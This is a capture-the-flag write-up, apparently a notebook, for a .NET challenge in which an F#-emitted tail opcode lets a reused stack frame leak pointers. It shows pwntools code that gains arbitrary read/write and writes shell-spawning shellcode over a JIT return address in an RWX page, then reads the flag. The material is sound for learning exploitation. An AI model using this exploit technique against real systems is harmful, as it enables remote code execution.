# Solution for Pointy Tail

_This challenge was inspired by a bug seen in the actual F# compiler (fsc.exe) sometime between .NET 5.0 and .NET 6.0 (and subsequently fixed), where it can emit a tail opcode incorrectly. So this challenge is the result of wondering "how much damage could a single .tail opcode do?"._

In [1]:
from pwn import *
import ast, struct

In [2]:
sh = remote('fun.chall.seetf.sg', 50007)
sh.recvline(False)

[x] Opening connection to fun.chall.seetf.sg on port 50007
[x] Opening connection to fun.chall.seetf.sg on port 50007: Trying 34.131.197.225
[+] Opening connection to fun.chall.seetf.sg on port 50007: Done


b'Which is better, a struct or a class? Why not both!'

First things first, we need to figure out where the exploit is. It turns out that `Main()` sneakily calls `Main2()` via a tail call, i.e.
```
IL_002e: tail.
IL_0030: call void Challenge::Main2(valuetype Challenge/PointStruct&)
IL_0035: ret
```

This is a legal MSIL opcode that does not get emitted by C#, but can be emitted by F# (and in fact, this bug was seen in actual F# code). This produces assembly code where `Main2()` gets called via a [tail call](https://en.wikipedia.org/wiki/Tail_call), i.e. it `JMP`s to `Main2` and reuses the stack frame rather than starting a new frame.

This is where the fun happens. Since our `struct s` is created on the stack and passed via `ref`, reusing the stack frame effectively means that it can get overwritten. And indeed, `Main2()` just so happens to overwrite it nicely with the `class c` pointer, and the backreference to itself (via the input argument). To see what this all means, first we define a few useful functions.

In [3]:
# sends the empty string, so that we get back the PointStruct and the PointClass values
def getvals():
    sh.sendline()
    return [ast.literal_eval(sh.recvline(False).decode()[4:]) for _ in range(2)]

# functions to convert between 64-bit floats to 64-bit ints
def ftoi(n):
    return struct.unpack('q',struct.pack('d',n))[0]
def itof(n):
    return struct.unpack('d',struct.pack('q',n))[0]

In [4]:
s0,c0=getvals()
s0,c0

((6.90971895553006e-310, 6.95260779519737e-310),
 (0.21680875804578414, 0.07878193302692826))

On a normal un-tailed call, we would expect all four values to be randomly picked between 0 and 1, but what we're seeing here is that the first two are ridiculously small. This is because they are pointers rather than actual floats. We can see what they really represent:

In [5]:
[hex(ftoi(n)) for n in s0]

['0x7f325c008b90', '0x7ffc7996c870']

Either by trial and error or by inspecting the output assembly, we find that the first value is a pointer that points to the `PointClass` (which itself is an 8-bit Method Table followed by the `x` and `y` values), and the second value points to itself. This means that:
1. The ability to write to the first value means we have arbitrary read/write access.
2. Knowing the second value means we know where the stack is, and thus have a return address.

So now the challenge reduces to a regular pwn challenge, and we can use standard ROP methods or similar. We will exploit the fact the the JIT places the return address in a RWX page, so we simply overwrite this with some shellcode and we are done.

In [6]:
shellcode = asm(shellcraft.amd64.linux.sh(), arch='amd64')
len(shellcode)

48

The default shellcode provided by shellcraft gives us a 48-byte exploit, which we can fit into six 8-bit floats. So the plan is to leak the return address, and fill in these bytes. First, let's see what the address is.

In [7]:
s_addr = ftoi(s0[1])
sh.sendline(f's {itof(s_addr + 16)} 0'.encode())
retn_addr = ftoi(getvals()[1][0])
hex(retn_addr)

'0x7f330d8b6a17'

Ok, we're ready to do some writing. Since the `class c` pointer actually points the Method Table, with the `x` and `y` following it, we need to set it to point to 8 bytes before wherever we want to write our bytes. Finally, we exit the loop by throwing an exception (e.g. sending it just `s` causes an array index out of bounds exception) and sleep for a bit to make sure we're inside a shell.

In [8]:
fs = struct.unpack('dddddd', shellcode)
for i in range(3):
    sh.sendline(f's {itof(retn_addr-8+16*i)} 0'.encode())
    sh.sendline(f'c {fs[2*i]} {fs[2*i+1]}'.encode())

sh.sendline(b's')
sleep(1)

In [9]:
sh.sendline(b'cat flag.txt')
print(sh.recvline(False))

b'SEE{fsharp_can_emit_tail_opcode_3eb8f64b9e9569c7}'
